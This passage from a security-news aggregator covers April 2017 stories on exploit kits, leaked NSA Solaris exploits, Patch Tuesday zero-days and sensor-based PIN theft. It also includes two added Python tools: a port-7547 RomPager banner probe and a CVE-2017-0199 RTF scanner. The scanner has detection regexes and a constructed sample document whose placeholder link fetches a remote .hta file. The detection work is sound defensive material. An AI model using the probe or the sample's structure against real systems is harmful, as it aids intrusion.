The group's spokesperson also told IBT that he could not offer proof that the transferred bitcoins really came from Apple. He added, however, that the group's activity does not end with this operation and that it is planning something further.
Apple itself, which issued only a single brief statement over the whole course of the widely covered affair, did not respond to IBT's query.
Psycho-Analytics Could Aid Insider Threat Detection
12.4.2017 securityweek Safety
Psycho-Analytics Could Help Detect Future Malicious Behavior
The insider threat is perhaps the most difficult security risk to detect and contain -- and concern is escalating to such an extent that a new bill, H.R.666 - Department of Homeland Security Insider Threat and Mitigation Act of 2017, passed the House unamended in January 2017.
The bill text requires the Department of Homeland Security (DHS) to establish an Insider Threat Program, including training and education, and to "conduct risk mitigation activities for insider threats." What it does not do, however, is explain what those 'mitigation activities' should comprise.
One difficulty is that the insider is not a uniform threat. It includes the remote attacker who becomes an insider through using legitimate but stolen credentials, the naive employee, the opportunistic employee, and the malicious insider. Of these, the malicious insider is the most intransigent concern.
Psycho-analytics Used for Insider Threat Detection
Traditional security controls, such as access control and DLP, have some, but limited, effect. In recent years they have been supplemented by user behavior analytics (UBA), which uses machine learning to detect anomalous user behavior within the network.
"Behavioral analytics is the only way to... get real insight into insider threat," explains Nir Polak, CEO of Exabeam. "UBA tells you when someone is doing something that is unusual and risky, on an individual basis and compared to peers. UBA cuts through the noise to give real insight – any agencies looking to get a handle on insider threat should be looking closely at UBA."
Humphrey Christian, VP of Product Management, at Bay Dynamics, advocates a combination of UBA and risk management. "A threat is not a threat if it's targeting an asset that carries minimal value to the organization. An unusual behavior is also not a threat if it was business justified, such as it was approved by the employee's manager," he told SecurityWeek. "Once an unusual behavior is identified, the application owner who governs the application at risk, must qualify if he indeed gave the employee access to the asset. If the answer is 'no', then that alert should be sent to the top of the investigation pile."
This week a new paper published by the Intelligence and National Security Alliance (INSA) proposes that user behavioral analytics should go a step further and incorporate psycho-analytics set against accepted behavior models. These are not just a baseline of acceptable behavior on the network; they incorporate the psychological effect of life events both inside and outside the workplace. The intent is not merely to respond to anomalous behavior that has already happened, but to get ahead of the curve and predict malicious behavior before it happens.
The INSA paper starts from the observation that employees don't just wake up one morning and decide to be malicious. Malicious behavior is invariably the culmination of progressive dissatisfaction. That dissatisfaction can be with events both within and outside the workplace. INSA's thesis is that clues to this progressive dissatisfaction could and should be detected by technology; machine learning (ML) and artificial intelligence (AI).
This early detection would allow managers to intervene and perhaps help a struggling employee and prevent a serious security event.
Early signs of unhappiness within the workplace can be relatively easy to detect when they manifest as 'counterproductive work behaviors' (CWBs). INSA suggests that there are three key insights "that are key to detecting and mitigating employees at risk for committing damaging insider acts." CWBs do not occur in isolation; they usually escalate; and they are seldom spontaneous.
Successful insider threat mitigation can occur when early non-harmful CWBs can be detected before they escalate.
Using existing references, such as the fifth edition of the Diagnostic and Statistical Manual of Mental Disorders (DSM-5), INSA provides a table of stressors and the CWBs potentially linked to them. For example, emotional stress at a minor level could lead to repeated tardiness; at a more serious level it could lead to bullying co-workers and unsafe (dangerous) behavior. INSA's argument is that while individual CWBs might be missed by managers and HR, patterns -- and any escalation of stress indicators -- could be detected by ML algorithms. This type of user behavior analytics goes beyond anomalous network activity and seeks to recognize stressed user behavior that could lead to anomalous network activity before it happens.
But it still suffers from one weakness -- that is, where the stressors that affect the user's work occur entirely outside of the workplace; such as divorce, financial losses, or family illness. Here INSA proposes a more radical approach, but one that would work both inside and outside the workplace.
"In particular," it suggests, "sophisticated psycholinguistic tools and text analytics can monitor an employee's communications to identify life stressors and emotions and help detect potential issues early in the transformation process."
The idea is to monitor and analyze users' communications, which could include tweets and blogs. The analytics would look for both positive and negative words. An example is given. "I love food ... with ... together we ... in ... very ... happy." This sequence could easily appear in a single tweet; but the use of 'with', 'together', and 'in' would suggest an inclusive and agreeable temperament.
In fairness to doubters, INSA has done itself no favors with the misuse of a second example. Here Chelsea (formerly Bradley) Manning is quoted. "A second blog post," says INSA, "substantiates that Life Event and identifies an additional one, 'Relationship End/Divorce' with two mentions for each Life Event." The implication is that psycholinguistic analysis of this post would have highlighted the stressors in Manning's life and warned employers of the potential for malicious activity. The problem, however, is that the quoted section comes not from a Manning blog post written before the event, but from the logs of her May 2010 chats with Adrian Lamo (see Wired), after WikiLeaks had already started publishing the documents. Linguistic analysis in this case might have helped explain Manning's actions, but could have done nothing to forewarn the authorities.
The point, however, is that psycholinguistic analysis has the potential to highlight emotional status, and over time, highlight individuals on an escalating likelihood of developing first minor CWBs and ultimately major CWBs. The difficulty is that it really is kind of creepy. That creepiness is acknowledged by INSA. "Use of these tools entails extreme care to assure individuals' civil or privacy rights are not violated," it says. "Only authorized information should be gathered in accordance with predefined policies and legal oversight and only used for clearly defined objectives. At no point should random queries or 'What If' scenarios be employed to examine specific individuals without predicate and then seek to identify anomalous bad behavior."
Users' decreasing expectation of privacy would suggest that sooner or later psycholinguistic analysis for the purpose of identifying potential malicious insiders before they actually become malicious insiders will become acceptable. In the meantime, however, it should be used with extreme caution and with the clear, unambiguous informed consent of users. What INSA is advocating, however, is an example of what law enforcement agencies have been seeking for many years: the ability to predict rather than just respond to bad behavior.
Thousands of Hacked Routers Used for WordPress Attacks
12.4.2017 securityweek Attack
Tens of thousands of vulnerable home routers have been hacked and abused to launch attacks on WordPress websites, security firm Wordfence reported on Tuesday.
Last month, the company noticed that the number of attacks launched against customer websites from Algeria had increased significantly compared to the previous period. A closer analysis of the more than 10,000 attacking IP addresses revealed that most were associated with state-owned telecoms company Telecom Algeria.
Wordfence has determined that hackers exploited vulnerabilities in the routers provided by Telecom Algeria to customers, and then abused the hijacked devices to launch brute-force and other types of attacks on WordPress sites.
Researchers identified compromised routers from 27 other ISPs worldwide, including ones in Pakistan, India, the Philippines, Turkey, Egypt, Morocco, Malaysia, Brazil, Indonesia, Serbia, Saudi Arabia, Russia, Romania, Sri Lanka, Croatia and Italy.
The routers of more than a dozen of these ISPs are listening on port 7547, which is used by companies to manage their customers’ devices, and are running a vulnerable version of the AllegroSoft RomPager web server.
Versions prior to 4.34 of RomPager are affected by a critical vulnerability – tracked as CVE-2014-9222 and dubbed “Misfortune Cookie” – that can be exploited to hijack devices made by Huawei, Edimax, D-Link, TP-Link, ZTE, ZyXEL and other vendors. When they first disclosed the flaw back in December 2014, researchers warned that there had been at least 12 million vulnerable routers across most of the world’s countries.
According to Wordfence, 14 of the 28 ISPs provide routers vulnerable to Misfortune Cookie attacks. Researchers also pointed to another vulnerability, disclosed last year, that can be exploited to hijack home routers that use port 7547.
The company reported that, over the course of three days, 6.7 percent of all attacks aimed at protected WordPress websites came from home routers that have port 7547 open.
In the past month, Wordfence has seen more than 90,000 unique IP addresses from the 28 ISPs that appear to be associated with compromised routers. Experts said most IP addresses generate less than 1,000 attacks over the course of up to 48 hours, after which they stop.
Wordfence has made available a simple online tool that can be used to check whether a router has port 7547 open.
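Both router write-ups above (the securityaffairs piece and this one) come down to the same two questions about a device: is port 7547 reachable, and does whatever answers there identify itself as a RomPager build older than 4.34? The following is an added example, not Wordfence's online tool, that answers both from a host you pass in. The banner it recognises is the HTTP Server header; a router that hides or rewrites that header shows up as "open, version unknown", which still deserves a look. The local listener at the end exists only so the probe can be exercised offline against a constructed banner.

```python
"""Probe one host for an exposed TR-069 port and a vulnerable RomPager
banner. Added example; not Wordfence's tool. Host and port are whatever
the caller passes in; the test banner is constructed, not captured."""
import re
import socket
import threading

TR069_PORT = 7547                    # CWMP port ISPs use to manage CPE
MISFORTUNE_COOKIE_FIXED = (4, 34)    # RomPager 4.34 fixed CVE-2014-9222

SERVER_RE = re.compile(rb"^Server:\s*RomPager/(\d+)\.(\d+)", re.I | re.M)


def parse_rompager_version(response):
    """(major, minor) from the Server header, or None if not RomPager."""
    m = SERVER_RE.search(response)
    if not m:
        return None
    return int(m.group(1)), int(m.group(2))


def is_vulnerable_rompager(version):
    """Misfortune Cookie affects every RomPager build before 4.34."""
    return version is not None and version < MISFORTUNE_COOKIE_FIXED


def probe(host, port=TR069_PORT, timeout=3.0):
    """Connect, send a minimal HTTP request, classify the answer.

    Returns {'open': bool, 'version': (maj, min) or None, 'vulnerable': bool}.
    A closed or filtered port yields open=False and nothing else."""
    result = {"open": False, "version": None, "vulnerable": False}
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            result["open"] = True
            s.sendall(b"GET / HTTP/1.0\r\nHost: %s\r\n\r\n" % host.encode())
            data = b""
            while len(data) < 4096:          # headers are all we need
                chunk = s.recv(1024)
                if not chunk:
                    break
                data += chunk
    except (OSError, socket.timeout):
        return result
    result["version"] = parse_rompager_version(data)
    result["vulnerable"] = is_vulnerable_rompager(result["version"])
    return result


def serve_banner_once(banner):
    """Throwaway loopback listener that answers one connection with
    `banner`, so probe() can be exercised offline. Returns the bound port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def handle():
        conn, _ = srv.accept()
        with conn:
            conn.recv(1024)                  # swallow the request
            conn.sendall(banner)
        srv.close()

    threading.Thread(target=handle, daemon=True).start()
    return port


if __name__ == "__main__":
    # Constructed banner in the shape the article describes, not a capture.
    fake = b"HTTP/1.0 200 OK\r\nServer: RomPager/4.07 UPnP/1.0\r\n\r\n"
    print(probe("127.0.0.1", serve_banner_once(fake)))
    print(probe("192.0.2.1"))   # TEST-NET address: expect open=False
```

Run it against the router's WAN address from outside your own network; from inside, many routers do not answer on the WAN interface at all, which is why Wordfence offers a hosted check.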
Terror Exploit Kit Rising as Sundown Disappears
12.4.2017 securityweek Exploit
One year after the exploit kit (EK) landscape was shaken by the sudden disappearance of the Angler and Nuclear kits, another change is happening in the segment. While the Sundown EK has been inactive for the past month or so, the recent Terror EK is being used in new campaigns, researchers say.
While not new, Sundown has been a small player in the EK market, and showed increased presence only after Neutrino became silent last September, although it didn’t make it to the top three by the end of the year.
Its operators have been highly active with the integration of new exploits and the adoption of new technologies, including steganography, which allowed them to hide exploits in harmless-looking image files.
Just weeks ago, Cisco Talos published an analysis of Sundown, revealing the latest changes the EK’s operators had adopted, such as a switch to new vulnerabilities to exploit and modifications to the landing page’s code, which started showing similarities to the RIG EK.
Soon after, however, security researchers noticed that Sundown had been silent for over a month and began to question whether it still existed:
Kafeine @kafeine
Sundown (Beps) and Nebula out ? More than one month since last hits.
11:26 AM - 8 Apr 2017
Variants of Sundown also seem to have disappeared from the scene, including Bizarro and Greenflash, which could suggest a complete cessation of operations, Malwarebytes Labs researchers say. However, it remains to be seen whether Sundown is just taking a break or has vanished for good.
At the same time, another EK is picking up pace, namely Terror. First detailed in January and considered a Sundown variant because of the many code similarities, Terror appears to be involved in several distribution campaigns, and the researchers suggest it could pose a real threat.
Terror EK's author, whom Trustwave identified on various underground forums by the handle @666_KingCobra, is selling the kit under different names, researchers say. The threat has apparently also been known as Blaze, Neptune and Eris.
The best known instance of Terror is engaged in a malvertising campaign distributing Smoke Loader, which Malwarebytes has been monitoring for a while. Leveraging various ad networks that generate low quality traffic, the campaign uses Internet Explorer, Flash, and Silverlight exploits to compromise users’ systems.
A newer campaign, however, uses a different landing page and no longer distributes Smoke Loader, instead pushing the Andromeda malware as the final payload. Active for only a few days, the campaign redirects visitors to the EK landing page either via a server-side 302 redirect or via script injection. Only Flash and Internet Explorer exploits are used in these attacks.
“Sundown EK was notorious for stealing exploits from others and the tradition continues with more copy/paste from the ashes of dead exploit kits. If this harvesting was done on higher grade EKs, we would have a more potent threat but this isn’t the case here,” Malwarebytes concludes.
DARPA Wants Hardware With Built-in Security
12.4.2017 securityweek Safety
DARPA seeking solutions for more secure hardware
The U.S. Defense Advanced Research Projects Agency (DARPA) announced this week a new program that aims to develop a framework for building hack protections directly into hardware.
The agency pointed out that the integrated circuits found in many devices often have weaknesses that software can exploit, and that software patches are only a temporary fix.
As part of a new 39-month program named System Security Integrated Through Hardware and Firmware (SSITH), DARPA hopes to receive proposals for new chip architectures which would disarm software attacks that leverage hardware flaws.
The SSITH project focuses on two main technical areas: developing a secure hardware architecture and tools to help manufacturers take advantage of security innovations, and identifying a methodology and metrics for determining the security status of new systems.
Some chip makers, such as Intel, have already been integrating various protections into their products, but DARPA wants design tools that would be widely available, leading to built-in security becoming a standard for integrated circuits used in U.S. Department of Defense and commercial systems.
DARPA said proposals should address one or more of the seven hardware vulnerability classes in the Common Weakness Enumeration (CWE) list: code injection, permissions and privileges, buffer errors, information leakage, resource management, numeric errors, and cryptographic issues.
The agency pointed out that more than 2,800 incidents have involved one of these vulnerabilities, and SSITH program manager Linton Salmon, of DARPA’s Microsystems Technology Office, believes more than 40 percent of software weaknesses can be addressed by removing these types of flaws.
“Security for electronic systems has been left up to software until now, but the overall confidence in this approach is summed up in the sardonic description of this standard practice as ‘patch and pray,’” said Salmon. “This race against ever more clever cyberintruders is never going to end if we keep designing our systems around gullible hardware that can be fooled in countless ways by software.”
Experts interested in submitting a proposal can learn more about the project and have the opportunity to team up with others on Friday, April 21, 2017, at the Booz Allen Hamilton Conference Center.
Watch out! Shadow Brokers dump includes remote root exploits for Solaris boxes
12.4.2017 securityaffairs BigBrothers
The security expert Matthew Hickey has discovered two tools dubbed EXTREMEPARR and EBBISLAND which were specifically designed to target Solaris systems.
After the mysterious Shadow Brokers group leaked an archive containing stolen NSA hacking tools and exploits, security experts began analyzing the huge trove of data and found that NSA operators had developed attack code to compromise Oracle's Solaris.
Cyber security expert Matthew Hickey, co-founder of the British security firm Hacker House, discovered while digging through the archive two tools, dubbed EXTREMEPARR and EBBISLAND, that were specifically designed to target Solaris systems.
Hacker Fantastic @hackerfantastic
EXTREMEPARR - 0day local privilege escalation attack working on Solaris 7,8,9,10 x86 & SPARC (confirmed & tested, platforms & versions.)
9:31 PM - 10 Apr 2017
Hacker Fantastic @hackerfantastic
CONFIRMED #0day EBBISLAND (EBBSHAVE) is a root RCE via RPC XDR overflow in Solaris 6, 7, 8, 9 & 10 (possibly newer) both SPARC and x86. pwn
12:00 AM - 11 Apr 2017
Between them, the two tools let a logged-in user escalate privileges to root and let a remote attacker obtain root access over the network. They work on Solaris versions 6 to 10 on x86 and SPARC, and the experts believe they could also work on the latest release, version 11.
The EXTREMEPARR tool elevates the logged-in entity (e.g. a user or a script) to root by abusing dtappgather, file permissions, and the setuid binary at.
The EBBISLAND tool can be pointed at any open RPC service to spawn a remote root shell on a vulnerable Solaris box; it triggers a buffer overflow in Solaris's XDR code.
In short, the NSA could open a root shell on any Solaris system, and the experts noted that using the exploits requires no particular skill.
“These are prebuilt static binaries and you can run them out of the box with very little technical knowledge,” Hickey told The Register.
Hacker Fantastic @hackerfantastic
The NSA had the power to hack any Oracle Solaris box in the world via UDP/TCP generically with anti-forensics capabilities and its public.
12:23 AM - 11 Apr 2017
Hickey scanned the Internet for vulnerable connected devices using the popular Shodan.io search engine and found thousands of exposed systems. But the real threat, he said, is that many more such machines run internally behind firewalls, where the exploit code could be used to root them and move laterally once an attacker gains a foothold within an organization.
Microsoft Issues Patches for Actively Exploited Critical Vulnerabilities
11.4.2017 thehackernews Vulnerebility
Besides a previously undisclosed code-execution flaw in Microsoft Word, the tech giant has patched two more zero-day vulnerabilities that attackers had been exploiting in the wild for months, as part of this month's Patch Tuesday.
In total, Microsoft patched 45 unique vulnerabilities across nine products, including three previously undisclosed vulnerabilities under active attack.
The first vulnerability under attack, CVE-2017-0199, is a remote code execution flaw that could allow an attacker to take over a computer that was fully up to date before this release, as soon as the victim opens a Word document containing a booby-trapped OLE2link object.
The attack bypasses most of the exploit mitigations Microsoft has developed, and according to Ryan Hanson of security firm Optiv, in some cases the exploit can execute malicious code even when Protected View is enabled.
As The Hacker News reported Monday, this code-execution flaw in Microsoft Word was being exploited by hackers to spread a version of infamous Dridex banking trojan.
Also, according to blog posts published Tuesday by security firms FireEye and Netskope, hackers are exploiting the same Word vulnerability to install Latentbot and Godzilla malware respectively.
Microsoft has released a fix for CVE-2017-0199 and credited Hanson with responsibly reporting the critical vulnerability to the company.
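The CVE-2017-0199 documents discussed here and in the Latentbot/Dridex/Finspy item earlier on this page share one shape: an RTF whose \objdata blob carries OLE native data naming the OLE2Link class with a remote target inside it, and an \objupdate (or \objautlink) control word so Word refreshes the link, and so fetches the HTA, as soon as the file opens. The scanner below is an added example, not code from Microsoft, FireEye, Optiv or the other vendors named here, that extracts and hex-decodes every \objdata group, looks for that class name and for ASCII or UTF-16LE URLs in the decoded bytes, and flags the combination. The embedded sample RTF is constructed to illustrate the layout; it is not a captured attack document, and its URL is a placeholder.

```python
"""Heuristic scanner for the CVE-2017-0199 OLE2Link pattern in RTF files.
Added example, not vendor code. SAMPLE_RTF below is constructed for
illustration: a simplified OLE1 object header (version, format id,
class-name length), the OLE2Link class name, then a placeholder link
target in UTF-16LE, as the moniker data in real samples carried it."""
import re

OBJDATA_RE = re.compile(r"\\\*\\objdata\s*([0-9A-Fa-f\s]+)")
URL_ASCII_RE = re.compile(rb"https?://[\x21-\x7e]+")
URL_UTF16_RE = re.compile(
    rb"h\x00t\x00t\x00p\x00(?:s\x00)?:\x00/\x00/\x00(?:[\x21-\x7e]\x00)+")


def extract_objdata(rtf_text):
    """Decode every {\\*\\objdata <hex>} group into bytes."""
    blobs = []
    for m in OBJDATA_RE.finditer(rtf_text):
        hexstr = re.sub(r"\s+", "", m.group(1))
        if len(hexstr) % 2:          # tolerate a dangling nibble
            hexstr = hexstr[:-1]
        try:
            blobs.append(bytes.fromhex(hexstr))
        except ValueError:
            continue
    return blobs


def scan_rtf(rtf_text):
    """Return indicator flags for one RTF document.

    ole2link  - some object's native data names the OLE2Link class
    objupdate - \\objupdate or \\objautlink forces a refresh on open
    urls      - remote targets found inside object data
    suspicious - OLE2Link together with a URL or an auto-update word"""
    report = {"ole2link": False, "objupdate": False, "urls": [],
              "suspicious": False}
    report["objupdate"] = ("\\objupdate" in rtf_text
                           or "\\objautlink" in rtf_text)
    for blob in extract_objdata(rtf_text):
        if b"OLE2Link" in blob:
            report["ole2link"] = True
        found = [m.group(0).decode("ascii")
                 for m in URL_ASCII_RE.finditer(blob)]
        found += [m.group(0).decode("utf-16-le")
                  for m in URL_UTF16_RE.finditer(blob)]
        for url in found:
            if url not in report["urls"]:
                report["urls"].append(url)
    report["suspicious"] = report["ole2link"] and (
        report["objupdate"] or bool(report["urls"]))
    return report


def scan_file(path):
    """Scan an RTF on disk; RTF is 7-bit so latin-1 never fails to decode."""
    with open(path, "r", encoding="latin-1") as fh:
        return scan_rtf(fh.read())


# Constructed sample (placeholder URL), not a captured document.
_URL = "http://example.invalid/template.hta"
_NATIVE = (b"\x01\x05\x00\x00"            # OLE1 version
           + b"\x02\x00\x00\x00"          # format id
           + b"\x09\x00\x00\x00OLE2Link\x00"   # length-prefixed class name
           + b"\x00\x00\x00\x00"          # simplified: skip topic/item names
           + _URL.encode("utf-16-le") + b"\x00\x00")
SAMPLE_RTF = ("{\\rtf1\\ansi{\\object\\objautlink\\objupdate\\rsltpict"
              "{\\*\\objclass Word.Document.8}{\\*\\objdata "
              + _NATIVE.hex() + "}}}")

if __name__ == "__main__":
    print(scan_rtf(SAMPLE_RTF))
```

A legitimate linked object also uses \objautlink, so the verdict keys on the OLE2Link class name plus a remote target rather than on the control word alone; treat a hit as a reason to detonate the file in a sandbox, not as proof of exploitation, and remember that the same trick later shipped in other containers than RTF.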
Patch for Critical IE Flaw Being Exploited in the Wild
The company also pushed out a patch for another critical vulnerability (CVE-2017-0210) under active attack. The flaw is an elevation of privilege vulnerability in Internet Explorer that an attacker can exploit by tricking a victim into visiting a compromised website.
The vulnerability could allow the attacker to access sensitive information from one domain and inject it into another domain.
"The vulnerability by itself does not allow arbitrary code to be run. However, the vulnerability could be used in conjunction with another vulnerability (for example, a remote code execution vulnerability) that could take advantage of the elevated privileges when running arbitrary code," Microsoft's guidance for the flaw reads.
This IE vulnerability is also being exploited in the wild.
Another Critical Word Vulnerability Yet Unpatched!
The third previously undisclosed flaw (CVE-2017-2605) resides in the Encapsulated PostScript (EPS) filter in Microsoft Office, but Microsoft did not actually release an update for this flaw in Tuesday's update batch.
However, the tech giant issued an update for Microsoft Office that disables the EPS filter in MS Office by default as a defense measure. This Word vulnerability is also being exploited in the wild when a target opens a malicious EPS image in Word.
"Microsoft is aware of limited, targeted attacks that could leverage an unpatched vulnerability in the EPS filter and is taking this action to help reduce customer risk until the security update is released," the guidance for the flaw reads.
The company also issued a patch for Windows 10 Creators Update, which was made available on Tuesday, addressing some remote code execution flaws and elevation of privilege bugs.
In total, Microsoft rolled out 15 security updates on Tuesday patching dozens of unique CVEs in its products, including the Windows OS, Exchange Server, Edge and Internet Explorer, Office, Office Services and Office Web Apps, Visual Studio for Mac, Silverlight and Adobe Flash.
Users are strongly advised to install updates as soon as possible in order to protect themselves against the active attacks in the wild on three separate Microsoft products.
Hackers Can Steal Your Passwords Just by Monitoring SmartPhone Sensors
11.4.2017 thehackernews Mobil
Do you know how many kinds of sensors your smartphone has inbuilt? And what data they gather about your physical and digital activities?
An average smartphone these days is packed with a wide array of sensors such as GPS, Camera, microphone, accelerometer, magnetometer, proximity, gyroscope, pedometer, and NFC, to name a few.
Now, according to a team of scientists from Newcastle University in the UK, hackers can potentially guess PINs and passwords that you enter on a bank website, in an app or on your lock screen to a surprising degree of accuracy by monitoring your phone's sensors, such as the angle and motion of the phone while you are typing.
The danger stems from the way malicious websites and apps can access most of a smartphone's internal sensors without requesting any permission, even if you are entering your password on a secure website over HTTPS.
Your Phone doesn't Restrict Apps from Accessing Sensors' Data
Your smartphone apps usually ask for your permission before accessing sensors like GPS, camera, and microphone.
But due to the boom in mobile gaming and health and fitness apps over the last few years, mobile operating systems do not restrict installed apps from accessing data from the plethora of motion sensors such as the accelerometer, gyroscope, NFC, motion and proximity sensors.
Any malicious app can then use this data for nefarious purposes. The same is also true for malicious websites.
"Most smartphones, tablets and other wearables are now equipped with a multitude of sensors, from the well-known GPS, camera, and microphone to instruments such as the gyroscope, proximity, NFC, and rotation sensors and accelerometer," Dr. Maryam Mehrnezhad, the paper's lead researcher, said describing the research.
"But because mobile apps and websites don't need to ask permission to access most of them, malicious programs can covertly 'listen in' on your sensor data and use it to discover a wide range of sensitive information about you such as phone call timing, physical activities and even your touch actions, PINs and passwords."
Video Demonstration of the Attack
Scientists have even demonstrated an attack that can record data from around 25 sensors in a smartphone. They have also provided a video demonstration of their attack, showing how their malicious script is collecting sensor data from an iOS device.
The team wrote a malicious Javascript file with the ability to access these sensors and log their usage data. This malicious script can be embedded in a mobile app or loaded on a website without your knowledge.
Now all an attacker needs is to trick victims into either installing the malicious app or visiting the rogue website.
Once this is done, while the malicious app or website runs in the background of the phone, the script keeps reading the various sensors, records the information needed to guess the PIN or password from whatever the victim types on the device, and sends it to an attacker's server.
Guessing PINs and Passwords with a High Degree of Accuracy
Researchers were able to guess four-digit PINs on the first try with 74% accuracy and on the fifth try with 100% accuracy based on the data logged from 50 devices by using data collected from just motion and orientation sensors, which do not require any special permission to access.
The scientists were even able to use the collected data to determine where users were tapping and scrolling, what they were typing on a mobile web page and what part of the page they were clicking on.
Researchers said the goal of their work was simply to raise awareness of the many sensors in a smartphone that apps can access without any permission, and for which vendors have not yet included any restrictions in their standard built-in permission models.
"Despite the very real risks, when we asked people which sensors they were most concerned about we found a direct correlation between perceived risk and understanding," Mehrnezhad said. "So people were far more concerned about the camera and GPS than they were about the silent sensors."
Mehrnezhad says the team had alerted leading browser providers such as Google and Apple of the risks, and while some, including Mozilla and Safari, have partially fixed the issue, the team is still working with the industry to find an ideal solution.
More technical details can be found in the full research paper, titled "Stealing PINs via mobile sensors: actual risk versus user perception," published Tuesday in the International Journal of Information Security.
Adobe Patches Flash, Reader Flaws Exploited at Pwn2Own
12.4.2017 securityweek Vulnerebility
Adobe released security updates for several of its products on Tuesday to address a total of 59 vulnerabilities, including flaws disclosed last month at the Pwn2Own 2017 hacking competition.
A majority of the security holes, 47 to be precise, have been patched in the Windows and Mac versions of Adobe Acrobat and Reader. The vulnerabilities, rated critical with a priority rating of 2 (i.e. no exploits and exploitation not imminent), have been described as memory corruptions that could lead to arbitrary code execution or memory address leaks.
Seven critical vulnerabilities have been patched in Adobe Flash Player. The security holes are use-after-free and memory corruption issues that could lead to code execution.
Many of the flaws patched on Tuesday were reported to Adobe via Trend Micro’s Zero Day Initiative (ZDI), including several Reader and Flash Player vulnerabilities disclosed at ZDI’s Pwn2Own competition.
ZDI has published five advisories detailing the Pwn2Own security holes tracked as CVE-2017-3062, CVE-2017-3063, CVE-2017-3055, CVE-2017-3056 and CVE-2017-3057.
Adobe has also resolved vulnerabilities in Photoshop CC for Mac and Windows, Campaign, and the Creative Cloud Desktop Application for Windows. The company has found no evidence of exploitation in the wild.
Microsoft has also released patches for tens of vulnerabilities this Tuesday, including for zero-day flaws exploited in the wild.
One of the zero-days is CVE-2017-0199, an Office and WordPad vulnerability that has been exploited to deliver malware such as Dridex, WingBird, Latentbot and Godzilla. Another zero-day is CVE-2017-0210, a privilege escalation vulnerability affecting Internet Explorer.
The third zero-day impacts Office and it hasn’t actually been patched, but Microsoft did release a mitigation that should help reduce the risk of exploitation. This flaw has been exploited in limited, targeted attacks.
Microsoft Patches Office, IE Flaws Exploited in Attacks
12.4.2017 securityweek Vulnerebility
Microsoft’s security updates for April 2017 address more than 40 critical, important and moderate severity vulnerabilities, including three zero-day flaws that have been exploited in attacks.
According to Microsoft, the updates resolve flaws affecting Edge, Internet Explorer, Windows, Office, Visual Studio for Mac, .NET Framework, Silverlight and Adobe Flash Player components.
One of the zero-days patched by Microsoft this month is CVE-2017-0199, an Office and WordPad vulnerability that can be exploited for remote code execution. The security hole has been exploited in the wild by malicious actors to deliver various pieces of malware, including Dridex, WingBird, Latentbot and Godzilla.
Another vulnerability that has been actively exploited is CVE-2017-0210, a privilege escalation weakness affecting Internet Explorer. Microsoft said the flaw exists due to the lack of proper enforcement of cross-domain policies, and it can be exploited by tricking the targeted user into accessing a specially crafted web page. However, the company has not shared any information about the attacks it has been exploited in.
The third zero-day, an Office flaw which Microsoft says has been exploited in limited targeted attacks, has not been patched with this month’s updates. However, the company has released a mitigation that should help reduce the risk of exploitation until a patch is made available.
The issue, tracked by Microsoft with the identifier 2017-2605 (no CVE), is related to the Encapsulated PostScript (EPS) Filter in Office. The company’s mitigation turns off the EPS filter by default.
The list of critical flaws addressed on Tuesday also includes 13 bugs affecting Internet Explorer, Edge, .NET, Office and Hyper-V.
Microsoft has been transitioning from security bulletins to a database called Security Update Guide. The transition has now been completed – no security bulletins have been published this month – and while some users welcome the change, others said they liked the old format better.
“[The] Security Update Guide provides a number of nice filtering options, but you lose a bit of the organization,” said Chris Goettl, product manager with Ivanti. “For instance, to look at all CVEs that are resolved for a single update, you must now look at each individually where the bulletin page had them organized into one place. Likely, it will take a while for people to get used to.”
It’s also worth noting that this is the last round of security updates for Windows Vista, which has reached end of support.
Adobe patches tens of flaws across several products
Security updates released on Tuesday by Adobe patch nearly 60 vulnerabilities across several of the company’s products. The Acrobat and Reader updates address 47 flaws, including many that could lead to arbitrary code execution.
The rest of the security holes impact Flash Player, Photoshop CC for Mac and Windows, Campaign, and the Creative Cloud Desktop Application for Windows. Adobe has found no evidence of exploitation in the wild.
Microsoft Patch Tuesday fixes three flaws actively exploited in attacks in the wild
12.4.2017 securityaffairs Vulnerebility
Today Microsoft Patch Tuesday fixed the zero-day Word vulnerability that has been actively exploited in attacks in the wild.
Microsoft today patched the zero-day Word vulnerability that has been exploited in attacks in the wild. Just yesterday I wrote about a phishing campaign leveraging the flaw to deliver the Dridex banking Trojan.
Microsoft published security patches that addressed a total of 45 CVEs in nine products, including Internet Explorer, Microsoft Edge and Windows 10. Most of the updates address problems in Microsoft IE and Edge browsers.
The company confirmed that three of the vulnerabilities among this Tuesday's updates are under active attack in the wild.
The first vulnerability actively exploited by attackers is tracked as CVE-2017-0199; it allows attackers to use a specially-crafted document embedding an OLE2link object to spread malware such as the Dridex banking Trojan.
“While labelled as an Outlook issue, this bug actually stems from an issue within RTF files. According to published reports, the exploit uses an embedded OLE2link object in a specially-crafted document. It should also be noted that these attacks can be thwarted by enabling Office’s Protected View feature. There are updates for both Office and Windows to be applied, and both should be considered necessary for complete protection.” reads the Patch Tuesday analysis by the Zero Day Initiative.
The second flaw exploited in the wild is an Internet Explorer elevation of privilege vulnerability tracked as CVE-2017-0210. The flaw could be exploited by attackers to access information from one domain and inject it into another domain.
“The exploit allows an attacker to access sensitive information from one domain and inject it into another domain, which could allow the attacker to gain elevated privileges. However, direct code execution is not possible through this bug alone. Instead, it would likely be used with a bug that executes code at a low integrity level to elevate the code execution to medium level integrity.” continues ZDI.
Microsoft also published 2017-2605: “Defense-in-Depth Update for Microsoft Office”, to address a flaw tracked as CVE-2017-2605. It is a Microsoft Office bug in the Encapsulated PostScript (EPS) filter in Office.
“According to Microsoft, they are aware of “limited targeted attacks” that take advantage of an unpatched vulnerability in the EPS filter. This temporary measure is being pushed out until a true fix is released. Issues like this used to be covered by Security Advisories, so perhaps this indicates Microsoft has chosen to do away with these as well.” states the analysis.
Microsoft did not issue a fix for this flaw; instead it updated Microsoft Office to turn off the EPS filter by default as a defense-in-depth measure.
Microsoft also issued a fix for Windows 10 (Creators Update) that addresses several remote code execution and elevation of privilege flaws.
Looking at the list of vulnerabilities fixed by this Microsoft Patch Tuesday, we find:
CVE-2017-0201, an IE RCE vulnerability;
CVE-2017-0093, an Edge scripting engine memory corruption vulnerability;
CVE-2017-0162, CVE-2017-0163 and CVE-2017-0180, Hyper-V vulnerabilities.
The Mirai botnet is back and includes a Bitcoin Mining component
12.4.2017 securityaffairs BotNet
Experts at IBM X-Force security firm warn of a new Mirai Botnet implementing Bitcoin crypto-currency mining capabilities.
